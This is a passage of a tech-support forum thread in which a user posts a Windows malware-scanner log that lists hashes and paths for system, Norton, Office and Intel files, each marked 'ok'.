12:17:21.0622 0x1aa8 [ 2B94964BB428EC1D160259609990724B, 801ACF8F945AF6FF42F7ED7EA7A3B56EE8BF13DEC61CE48CA3F50ED6C14A22A8 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwsetup.dll
12:17:21.0622 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwsetup.dll - ok
12:17:21.0625 0x1aa8 [ 355A138ABDFD43FBABCAE3A1B06AB93D, 26015CE72D27E2F7FA7322203CDF236896A079F8325F1B24975CA12C57FD4B7B ] C:\Windows\System32\wmpps.dll
12:17:21.0626 0x1aa8 C:\Windows\System32\wmpps.dll - ok
12:17:21.0628 0x1aa8 [ 860FCE24621F9707E66B381636FBE00B, 4FC03E40C529BEDEDC7D6CB5EA53AB38C0F4775B08CA9534DAEAF3DC8F5DFC80 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\npctray.dll
12:17:21.0628 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\npctray.dll - ok
12:17:21.0632 0x1aa8 [ F149E8CAE538DBF7059B00326673F602, 8B576A68AE43B506D0C7E91C63E8EF1DB9E73F0E87E48CF57086BCE51E5F8C36 ] C:\Windows\System32\wmpmde.dll
12:17:21.0632 0x1aa8 C:\Windows\System32\wmpmde.dll - ok
12:17:21.0635 0x1aa8 [ 3F50200237961034FACE602373838980, F97D72CC75D921CF8F8E0544614407358AEFF97A8F48E4A89F82689EE8F2FC86 ] C:\Windows\SysWOW64\FirewallAPI.dll
12:17:21.0635 0x1aa8 C:\Windows\SysWOW64\FirewallAPI.dll - ok


----------



## raphael100 (May 24, 2014)

12:17:21.0639 0x1aa8 [ 60C40211B9F80C19865911FAAFB64835, 4B565A66B86C8C9DB868CA31382A2C9812A5E707429F55BF84081CC2DCF06A39 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF25.dll
12:17:21.0639 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF25.dll - ok
12:17:21.0643 0x1aa8 [ BCEA9AB347E53BC03B2E36BE0B8BA0EF, 868DEFB78767E91694E83F931725257DF3FF79A4BFED3B914D27F3493EB7A8D0 ] C:\Windows\System32\httpapi.dll
12:17:21.0643 0x1aa8 C:\Windows\System32\httpapi.dll - ok
12:17:21.0647 0x1aa8 [ 3A6B04834CBD27C2B7BFCFFE19251CCC, 8B8BCFE60A6ED5803066B070D9B91339A490F640D02B7F9D2394F9EF0B4B0C14 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\uimain.dll
12:17:21.0647 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\uimain.dll - ok
12:17:21.0651 0x1aa8 [ 60C40211B9F80C19865911FAAFB64835, 4B565A66B86C8C9DB868CA31382A2C9812A5E707429F55BF84081CC2DCF06A39 ] C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF25.dll
12:17:21.0651 0x1aa8 C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF25.dll - ok
12:17:21.0655 0x1aa8 [ 1E1EA38A5051E9570832D1200D409ED2, B8754F9ACB499CB355BBDC1A577B51BF2E9372B6C3491B5A74471BCEFC628327 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF23.dll
12:17:21.0655 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF23.dll - ok
12:17:21.0659 0x1aa8 [ 6EF5F3F18413C367195F06E503AB86A6, 6F8B87FB4D67F9E76A51EF759B58A95D903C4AAC9C789A65A3FA1FC4F253D978 ] C:\Windows\SysWOW64\d3d9.dll
12:17:21.0659 0x1aa8 C:\Windows\SysWOW64\d3d9.dll - ok
12:17:21.0663 0x1aa8 [ 1E1EA38A5051E9570832D1200D409ED2, B8754F9ACB499CB355BBDC1A577B51BF2E9372B6C3491B5A74471BCEFC628327 ] C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF23.dll
12:17:21.0663 0x1aa8 C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF23.dll - ok
12:17:21.0667 0x1aa8 [ B7D930C68AB95263AE70AFC73034F379, C5577FECEF7E6B6914FE4B64527937187CCDA8C1E0F4F76A691958E0EF23A028 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF22.dll
12:17:21.0667 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF22.dll - ok
12:17:21.0671 0x1aa8 [ 77B1471A490B53B24EFE136F09F76550, A650C3A244306F8E605BDA8E74BFE438356BA4403B0CB61E980D3183E3F0A7C7 ] C:\Windows\SysWOW64\d3d8thk.dll
12:17:21.0671 0x1aa8 C:\Windows\SysWOW64\d3d8thk.dll - ok
12:17:21.0674 0x1aa8 [ 39C5F32747B3414D1BB216FDB1DEFC58, 6FAE64CB9748304090113903A5AE9E7154BE16BA2EEA7AB3EF04AB9D79B81380 ] C:\Windows\SysWOW64\dwmapi.dll
12:17:21.0674 0x1aa8 C:\Windows\SysWOW64\dwmapi.dll - ok
12:17:21.0678 0x1aa8 [ 0C3EF813BE902CDA369525043E5CAB8F, 50788110D7C620AB00D438F6AE66989A9EF1892C657084429EE02E1399647FCD ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symhtmdx.dll
12:17:21.0678 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symhtmdx.dll - ok
12:17:21.0683 0x1aa8 [ 021287C2050FD5DB4A8B084E2C38139C, EA27C640FE0F1E8BAE70BEF98E663E68A35336BB6D52D56B2367297D22C50648 ] C:\Windows\System32\WinSATAPI.dll
12:17:21.0683 0x1aa8 C:\Windows\System32\WinSATAPI.dll - ok
12:17:21.0687 0x1aa8 [ 66C87DB880052104808507D6FA84D68E, 46BD5C16225B3D0BF786FDA6461CE9A549DAA9FA38C8BDADAA0AF08FA6A24260 ] C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
12:17:21.0687 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL - ok
12:17:21.0690 0x1aa8 [ B7D930C68AB95263AE70AFC73034F379, C5577FECEF7E6B6914FE4B64527937187CCDA8C1E0F4F76A691958E0EF23A028 ] C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF22.dll
12:17:21.0690 0x1aa8 C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF22.dll - ok
12:17:21.0694 0x1aa8 [ 8349333DA1727399697951667BEEE00C, 6778E9B2013457B95F40B8C03EE191190F5EF26F95F7FE5DD6B1734E8498D722 ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF16.dll
12:17:21.0694 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF16.dll - ok
12:17:21.0700 0x1aa8 [ 8349333DA1727399697951667BEEE00C, 6778E9B2013457B95F40B8C03EE191190F5EF26F95F7FE5DD6B1734E8498D722 ] C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF16.dll
12:17:21.0700 0x1aa8 C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF16.dll - ok
12:17:21.0704 0x1aa8 [ 28A7D7C7E2FDD1D55F12F750CD6331EC, 0CC0159D3F5682307439D8F3651A080430C7EAB8EFA25BA246AADF4665297E8D ] C:\Windows\System32\MSMPEG2ENC.DLL
12:17:21.0704 0x1aa8 C:\Windows\System32\MSMPEG2ENC.DLL - ok
12:17:21.0708 0x1aa8 [ 902480AC7F32F90B3DA2520A19171686, 4058A05856B1F8B41B19A0948C6179F0C468520F0669E94726913A9546A432DB ] C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF3.dll
12:17:21.0708 0x1aa8 C:\Program Files (x86)\Norton Internet Security\NortonData\21.1.0.18\Definitions\IPSDefs\20140603.001\IPSFF3.dll - ok
12:17:21.0712 0x1aa8 [ 1C0E369575F387460E2A5F28269B2CC4, 96F26EF7483F9EB7B79DFCF50BB0261B981322BF8FB9F239D617FEACCEC466C8 ] C:\Windows\SysWOW64\DWrite.dll
12:17:21.0712 0x1aa8 C:\Windows\SysWOW64\DWrite.dll - ok
12:17:21.0716 0x1aa8 [ 902480AC7F32F90B3DA2520A19171686, 4058A05856B1F8B41B19A0948C6179F0C468520F0669E94726913A9546A432DB ] C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF3.dll
12:17:21.0716 0x1aa8 C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_21.1.0.18\IPSFF\components\IPSFF3.dll - ok
12:17:21.0720 0x1aa8 [ 46767946E7B559D981C1DC04EC0AB36F, 69137AA9AEF9727FFD1B65AA4D658C6E8AAD3A062717B447260502B4D7DB90C6 ] C:\Windows\System32\devenum.dll
12:17:21.0720 0x1aa8 C:\Windows\System32\devenum.dll - ok
12:17:21.0724 0x1aa8 [ 558C42D165DB5799B4072DC0A9C27C0B, 2385E16ACF07252D5567EC091C1B39D39BB8199F60854D5A91EDC948C57B3A3F ] C:\Windows\System32\msdmo.dll
12:17:21.0724 0x1aa8 C:\Windows\System32\msdmo.dll - ok
12:17:21.0727 0x1aa8 [ 3C1936A12C62254F914A01BBC6A8DC69, 0068F7A8B0D9E9776B44EAD99007B0CE5A5600633F2B477E9EFAAC644408C70E ] C:\Windows\SysWOW64\d3d10_1.dll
12:17:21.0727 0x1aa8 C:\Windows\SysWOW64\d3d10_1.dll - ok
12:17:21.0731 0x1aa8 [ D4212AB475A3B25EC4DF574536C3EDC5, F8BBEECB66BA6DDE5A64ED41D8BF95A1C81470552B4BFD5B11D888156289CCDD ] C:\Windows\SysWOW64\d3d10_1core.dll
12:17:21.0731 0x1aa8 C:\Windows\SysWOW64\d3d10_1core.dll - ok
12:17:21.0736 0x1aa8 [ D4F264FE23F8953D840904418220C15E, 72EAF30265A0CC88DEC0FCA7869734D8C93572457C61A2BF1BDFFB20C061DBCD ] C:\Windows\SysWOW64\dxgi.dll
12:17:21.0736 0x1aa8 C:\Windows\SysWOW64\dxgi.dll - ok
12:17:21.0741 0x1aa8 [ 6DE66FE7C526637E74CD066461C7C871, 7E8980A3751762180D795EAC38458303BEAF8D1F85AB5F2D10D9CE7013090CBE ] C:\Windows\SysWOW64\d3d11.dll
12:17:21.0741 0x1aa8 C:\Windows\SysWOW64\d3d11.dll - ok
12:17:21.0747 0x1aa8 [ 332851CD2A34C1464ADF50BED5E8971D, 3C0CC2FAFB6186A94A6605B7382984C58B63810EFE1E537FD342C4E351A8A64B ] C:\Windows\System32\igdumd64.dll
12:17:21.0747 0x1aa8 C:\Windows\System32\igdumd64.dll - ok
12:17:21.0752 0x1aa8 [ 2B373B5F7E36B5ED5DA176D4400EF091, A7E220CC3661429D786693B277A7F39D5D9E24284B1D9E55DB6295AF7D97D104 ] C:\Windows\System32\sppobjs.dll
12:17:21.0752 0x1aa8 C:\Windows\System32\sppobjs.dll - ok
12:17:21.0756 0x1aa8 [ B010CF886420EE29C2C276646721D255, CBCD032D679ADE3A9942A1D116648D6A9ECC71F66F8630629E724E5EE23F9F73 ] C:\Windows\SysWOW64\wlanapi.dll
12:17:21.0756 0x1aa8 C:\Windows\SysWOW64\wlanapi.dll - ok
12:17:21.0761 0x1aa8 [ 1D6A771D1D702AE07919DB52C889A249, E5F3378AC40AEE6114EEAF3BF11DC1059466891CAE353E80C08622A60485C954 ] C:\Windows\SysWOW64\wlanutil.dll
12:17:21.0761 0x1aa8 C:\Windows\SysWOW64\wlanutil.dll - ok
12:17:21.0765 0x1aa8 [ A6C97E20C8373AA77F1FDE9B10ED2D24, F0D21C47B312C6A15D1F312E6F3189DBDE2A82142170B52F1B9EEB7C1A1FA666 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\codatapr.dll
12:17:21.0766 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\codatapr.dll - ok
12:17:21.0772 0x1aa8 [ A8FA3DFB4B41C13A63FA93998E1BC0F5, B1C9AD59299B1FF1611DA61CE954FFF14650F07C4D8280271531963AE5FEE805 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coshdobj.dll
12:17:21.0772 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coshdobj.dll - ok
12:17:21.0779 0x1aa8 [ F3C60D39F2BC24C429364FCE8A09C516, D01BC1672B2DE66C2D2F7BD783D95CBE83B5FDDBBB3381B27A1EEF6975769427 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ispwd.dll
12:17:21.0779 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ispwd.dll - ok
12:17:21.0785 0x1aa8 [ 484A283479DD33A4711B9D10908CE873, 49E4B5C41D4CC2AB5EE441DE3DF2FDD925F0162D1AE3F2F71452923BD7678D52 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ashelper.dll
12:17:21.0785 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\ashelper.dll - ok
12:17:21.0790 0x1aa8 [ E2A17BCC08D92F42E08AF6BA2F93ABA7, 5FC9D47BF4B1094BECC0C0DDCD5CD4318DD3E4495D982F8785331616D5B82599 ] C:\Windows\SysWOW64\ExplorerFrame.dll
12:17:21.0790 0x1aa8 C:\Windows\SysWOW64\ExplorerFrame.dll - ok
12:17:21.0794 0x1aa8 [ EE06B85BC69F18826302348A2AD089E0, 417205797CC9F6C986A863A61179784D9ADCAF1961EF8A4D9042D73C5A86509A ] C:\Windows\SysWOW64\dui70.dll
12:17:21.0794 0x1aa8 C:\Windows\SysWOW64\dui70.dll - ok
12:17:21.0798 0x1aa8 [ 6E1F8165C365D35C8E3C045AF0CDD481, B861360D0A014265A0BEB4CC2FE31EA05AE95120E8B07820C13A044D64C00E2B ] C:\Windows\SysWOW64\duser.dll
12:17:21.0798 0x1aa8 C:\Windows\SysWOW64\duser.dll - ok
12:17:21.0803 0x1aa8 [ A0AF52C17B86DFDD6E6F6271937E7AD3, A9E92F21ECE1C01FBF75F7C690430711E90E3DCA0A7F4E23AB4D7843B0054AC9 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\asoehook.dll
12:17:21.0803 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\asoehook.dll - ok
12:17:21.0809 0x1aa8 [ 2F46BF03B724C9E570229CFB71BF3488, DBED9BCB0DD7FA0D0248E528B8F2AC2E82FC6360B0F6DBED3E235474BC98B25B ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avpapp32.dll
12:17:21.0809 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\avpapp32.dll - ok
12:17:21.0814 0x1aa8 [ 184FA76F310B3494569B6CD6B8659E99, C1F24411D3B58EBB80C52562D5C5248BCA6BFBF46C5FFF5858C09DEA8E413810 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltaldis.dll
12:17:21.0814 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cltaldis.dll - ok
12:17:21.0820 0x1aa8 [ 07D0DFC3386F2BD40539729863BFDDBC, 3090EBA9D09505858B1185BE78B65789D380439EB806D3275B5EF7AEBE35B651 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwsesal.dll
12:17:21.0820 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwsesal.dll - ok
12:17:21.0826 0x1aa8 [ 38540AFDDA887B1518083452329C9848, BC431B9DFB09AA1875A641769F5D62B9A840C52D392637203B7E2C46C597029B ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coactmgr.dll
12:17:21.0826 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coactmgr.dll - ok
12:17:21.0831 0x1aa8 [ E3D5E244807AD655787FCD25477CC1BC, 8A378249C936914DBFEDAE310D6ACB93D488C8F490EC4AAB435861C413A5BB0F ] C:\Windows\SysWOW64\bthprops.cpl
12:17:21.0831 0x1aa8 C:\Windows\SysWOW64\bthprops.cpl - ok
12:17:21.0837 0x1aa8 [ E10B64DD666E66AEA0B3960DD89CED7B, 6933D2C1118ACF98F8DB45647EB81E36DB4BFAF642ED3098ADC4981DDB0922E7 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nuex.dll
12:17:21.0837 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nuex.dll - ok
12:17:21.0841 0x1aa8 [ C30A3E5DEEEBA22E782AC54C5AF5F352, 80939A7B5354032256706C6CA0C3CCC7E67CD1C1C81EAEA2CBC74997C0863662 ] C:\Windows\SysWOW64\samlib.dll
12:17:21.0841 0x1aa8 C:\Windows\SysWOW64\samlib.dll - ok
12:17:21.0845 0x1aa8 [ 1620FE36666F4BBC2314B7F360FB1965, EAC638C55DCB8C9CAA60040EBD9D08CCCD029E6450A882CF394B3331583390C7 ] C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
12:17:21.0845 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe - ok
12:17:21.0848 0x1aa8 [ 15AD47A33FC4D789003A7A19DF4982DC, 6ED09E7F6D6F0AC4DB9225DCA68EDE72326736D4A38751A770D108441122787B ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sdkcmn.dll
12:17:21.0849 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\sdkcmn.dll - ok
12:17:21.0853 0x1aa8 [ 296E78E378E60D4FA0F126D45F622F02, 36DEAD748D1C0D1518B1F0727052AECDC665DFC818F339B3D4663A8F3924E0F4 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\uialert.dll
12:17:21.0853 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\uialert.dll - ok
12:17:21.0856 0x1aa8 [ C8333F1F77A1B2E25F2202E892CAF634, 7A614AA4353ECE8175B6AB7B25EE26FAB22DF2A53C9A5A694B3A3B56F6C783A7 ] C:\Windows\SysWOW64\prnfldr.dll
12:17:21.0856 0x1aa8 C:\Windows\SysWOW64\prnfldr.dll - ok
12:17:21.0860 0x1aa8 [ CE826ED361FDA89D365E70A2BC3AB119, 3AB44823E04FBB4C56A45EC2B8228C7F11245E6BA3C982FB60BBED5BDE457859 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\userctxt.dll
12:17:21.0860 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\userctxt.dll - ok
12:17:21.0864 0x1aa8 [ C9FB9038B15036CA28CF0B4BE2BED9BD, 0F56384E798B3F725FFEFC6E31A980DA31F620DB847F601273EF19E8CE74A226 ] C:\Windows\System32\en-US\tquery.dll.mui
12:17:21.0864 0x1aa8 C:\Windows\System32\en-US\tquery.dll.mui - ok
12:17:21.0867 0x1aa8 [ ACE1BB07E0377E37A2C514CD2EC119B1, A9AFA4774DFA875496764D6E541A6333A3ACD3C5D2BBEF753C2D80BA83B4AC15 ] C:\Windows\System32\mssprxy.dll
12:17:21.0867 0x1aa8 C:\Windows\System32\mssprxy.dll - ok
12:17:21.0871 0x1aa8 [ D47EC6A8E81633DD18D2436B19BAF6DE, 0FB461E2D5E0B75BB5958F6362F4880BFA4C36AD930542609BCAF574941AA7AE ] C:\Windows\System32\upnphost.dll
12:17:21.0871 0x1aa8 C:\Windows\System32\upnphost.dll - ok
12:17:21.0875 0x1aa8 [ 1CBF15FDB0310345A68972EB5C5B948F, E1EDCE6216B24037B243AC68CEEBD510646B2EFD70BC118E68303F9ED85D1973 ] C:\Windows\SysWOW64\mssprxy.dll
12:17:21.0875 0x1aa8 C:\Windows\SysWOW64\mssprxy.dll - ok
12:17:21.0879 0x1aa8 [ 71E68F2443A80BD4DA89181889C457EA, 8665D3DDF92B05EF287FB6EC43782512C23A1437764CF6F4DE0B00547F3C696B ] C:\Windows\System32\udhisapi.dll
12:17:21.0879 0x1aa8 C:\Windows\System32\udhisapi.dll - ok
12:17:21.0882 0x1aa8 [ 544EFF88AC6C85DF5A4D6F18DFE08CFC, D688381F42062FD5D868E7770857C5951C41BA20A1B6E6F60B5D9536C02CD293 ] C:\Windows\SysWOW64\taskschd.dll
12:17:21.0882 0x1aa8 C:\Windows\SysWOW64\taskschd.dll - ok
12:17:21.0885 0x1aa8 [ 5987EA8A82C53359BCD2C29D6588583E, 59E2DF91F8DA9E33DE65FA67A6A49A7C3F524618A87EAEFC8A28C5304E7FAB85 ] C:\Windows\SysWOW64\linkinfo.dll
12:17:21.0886 0x1aa8 C:\Windows\SysWOW64\linkinfo.dll - ok
12:17:21.0890 0x1aa8 [ EDF2A5E96BEC469DA3F64E9BDD386111, 63C91BBDFA2E087293B010A4E45625FBD1BFCAF655BFADE2F8B1C36CF804B118 ] C:\Windows\SysWOW64\xmllite.dll
12:17:21.0890 0x1aa8 C:\Windows\SysWOW64\xmllite.dll - ok
12:17:21.0893 0x1aa8 [ 14800BD31701A5047AC3145BB1E698AE, 05B4E33B14B9623EE065634708D9C4CDC7226146F9614C4F374E6B097BB35A50 ] C:\Windows\SysWOW64\d2d1.dll
12:17:21.0893 0x1aa8 C:\Windows\SysWOW64\d2d1.dll - ok
12:17:21.0897 0x1aa8 [ C00DB14550E4BD49737F311C644E45FF, 7085C47DADEED82B6F98ED3903197D76B648E9D6CC67D40C789E236264D9A0DC ] C:\Windows\System32\wmi.dll
12:17:21.0897 0x1aa8 C:\Windows\System32\wmi.dll - ok
12:17:21.0900 0x1aa8 [ 5689832DF39E39E1FFD137653661ADF6, 4036241911C47BA75EA3194EABEB3864FB4F09E316A95B5964D561A8C1903716 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwhelper.dll
12:17:21.0900 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\fwhelper.dll - ok
12:17:21.0905 0x1aa8 [ E1AC89F6C5252057E6062843E36A6701, 32BE52836F2A011D46957AD60ABA48986B87026FD50ED09D8495460C7F1AB23E ] C:\Windows\SysWOW64\SearchProtocolHost.exe
12:17:21.0905 0x1aa8 C:\Windows\SysWOW64\SearchProtocolHost.exe - ok
12:17:21.0908 0x1aa8 [ 465DBF63A5049E4DB4BC5C12FFE781CB, D12F6A9FB92144B2CFFD28BD72C234BA42F882EF22122DB83CE5EB1B8EBE9017 ] C:\Windows\SysWOW64\tquery.dll
12:17:21.0908 0x1aa8 C:\Windows\SysWOW64\tquery.dll - ok
12:17:21.0912 0x1aa8 [ 81600E2E27ED61427AAD865B9BCDDB9D, 0D7D39C0A5A2C24FAADCA41658A1C62D13180B462C78103BDF6DBD76B64DD79A ] C:\Windows\SysWOW64\msidle.dll
12:17:21.0912 0x1aa8 C:\Windows\SysWOW64\msidle.dll - ok
12:17:21.0915 0x1aa8 [ A5D237B8673025B052C0E6FDB6A883E8, 0DAE34965C08F7450938A5145D2B53C68AA917744B8C6FCB130A35C03C5CEF6F ] C:\Windows\SysWOW64\msshooks.dll
12:17:21.0915 0x1aa8 C:\Windows\SysWOW64\msshooks.dll - ok
12:17:21.0919 0x1aa8 [ D2A5B2B09F2AF5ED13BF494508B09788, 3FA04E84EC5A575E7804E44BA3BF1C4143E53C4ACF6C823CD029711529B0BE2C ] C:\Windows\System32\msshooks.dll
12:17:21.0919 0x1aa8 C:\Windows\System32\msshooks.dll - ok
12:17:21.0923 0x1aa8 [ 49A3AD5CE578CD77F445F3D244AEAB2D, 1D200547C6277C4A878A9ADD94045F7ACCC583609985C592AAE9B9B9CA7B812A ] C:\Windows\System32\SearchFilterHost.exe
12:17:21.0923 0x1aa8 C:\Windows\System32\SearchFilterHost.exe - ok
12:17:21.0927 0x1aa8 [ 21F82D80FC4551A502123C4B2CA1C9C1, DAA94692D5EC230842DA32039DFB3E46BD1778B9ED7F0DC8A44338D3471FF3C7 ] C:\PROGRA~2\MICROS~1\Office14\MAPIPH.DLL
12:17:21.0927 0x1aa8 C:\PROGRA~2\MICROS~1\Office14\MAPIPH.DLL - ok
12:17:21.0930 0x1aa8 [ 6F8BEC6CF2E2576897FE22D5D88D2135, 742B0051E8A3CC1BB0295CD688C9340CD1366C2A703121B496DFA64F6C0855DD ] C:\PROGRA~2\MICROS~1\Office14\OLMAPI32.DLL
12:17:21.0930 0x1aa8 C:\PROGRA~2\MICROS~1\Office14\OLMAPI32.DLL - ok
12:17:21.0934 0x1aa8 [ D9EF901DCA379CFE914E9FA13B73B4C4, 3BE9693B7B2AFEE23D72AF5DA211379724D752F0EC18ACB7D3DE3DDFC5AE0004 ] C:\Windows\System32\wuaueng.dll
12:17:21.0934 0x1aa8 C:\Windows\System32\wuaueng.dll - ok
12:17:21.0938 0x1aa8 [ 4BDC03FA7C7088200695591B08422099, E7FF5B185D888DAF857B88A2A93ECB9193AB02414024C54D9FE97F455676B69B ] C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSO.DLL
12:17:21.0938 0x1aa8 C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSO.DLL - ok
12:17:21.0941 0x1aa8 [ 617F6EC0AC677C685479C1D0D1E76C6F, 77B22C0817558CE70EF7D3BBE04A275FFA35ED2E4AFB17DBDF353DF9932DC693 ] C:\Windows\System32\mspatcha.dll
12:17:21.0941 0x1aa8 C:\Windows\System32\mspatcha.dll - ok
12:17:21.0945 0x1aa8 [ 7FE0D0C8F53735EA17C9AE93EFE7AD5A, 7F67FE1E0453CCCFA5097BFC9087BA5F4B213CCA8AC17FC05D7ED02A52112E05 ] C:\Windows\System32\wups2.dll
12:17:21.0945 0x1aa8 C:\Windows\System32\wups2.dll - ok
12:17:21.0949 0x1aa8 [ D9E21CBF9E6A87847AFFD39EA3FA28EE, B2AE0BBF907D4108DE3485E6059DF8D10C39707CD508A55A2D9627A66D01AE78 ] C:\Windows\System32\SearchProtocolHost.exe
12:17:21.0949 0x1aa8 C:\Windows\System32\SearchProtocolHost.exe - ok
12:17:21.0953 0x1aa8 [ 48041BAEB60CE5F34F13CC2A1361E49C, AF82355A4C0D872F1F45261381C23C1510C2C77DD5F040B706FD7A3D63D4BAA4 ] C:\Windows\System32\mssph.dll
12:17:21.0953 0x1aa8 C:\Windows\System32\mssph.dll - ok
12:17:21.0957 0x1aa8 [ B1719E9B50C48512FB51A0CC94DB5879, 6CFB657DC171BC3EBC5B09558C5F85820D49A846D9A19DDB1BDF6511682DA1B6 ] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
12:17:21.0957 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe - ok
12:17:21.0961 0x1aa8 [ D480C9220BFE667DE65A46CDE80EA7E9, 3BD2C69533749792A8DA8E5602515BCA2E290194838F566334DBB54BB2CE2229 ] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\StatusStrings.dll
12:17:21.0961 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\StatusStrings.dll - ok
12:17:21.0966 0x1aa8 [ 122F89E0905FC656D56F65CD7A2E9B4D, 4D86847587EE5212129E98A814124E490EE29F411DBB9CF7ECEB1E9146B4FCAE ] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\xerces-c_2_7.dll
12:17:21.0966 0x1aa8 C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\xerces-c_2_7.dll - ok
12:17:21.0970 0x1aa8 [ 8F4BB0CFECED925D440ABC2481278360, 0A87E7E1B38300E211F2ECA10BFB9831CF79B128DEB9D7AB0AA6A715197FF2DD ] C:\Windows\System32\mapi32.dll
12:17:21.0970 0x1aa8 C:\Windows\System32\mapi32.dll - ok
12:17:21.0974 0x1aa8 [ 4CDBA05E0054802757CA355437C04EBD, C4ADC81632FC4152A16E60BB273BF8D96D1A4DA549586792F9EBD058D2DF41F8 ] C:\Program Files\Common Files\Microsoft Shared\Filters\offfiltx.dll
12:17:21.0975 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Filters\offfiltx.dll - ok
12:17:21.0979 0x1aa8 [ FF2B106909EED48C536DA04742C0324A, 7FEE709C0E37747412C3420EC2622F23F1CD87473D0A5890F2752E8F0B76D3E0 ] C:\Windows\System32\Query.dll
12:17:21.0979 0x1aa8 C:\Windows\System32\Query.dll - ok
12:17:21.0982 0x1aa8 [ A0A65D306A5490D2EB8E7DE66898ECFD, CE5DA408F4EDD5E81CE0925867F03C9A35172CF1571FE4C4C052E45AB69822BB ] C:\Windows\System32\linkinfo.dll
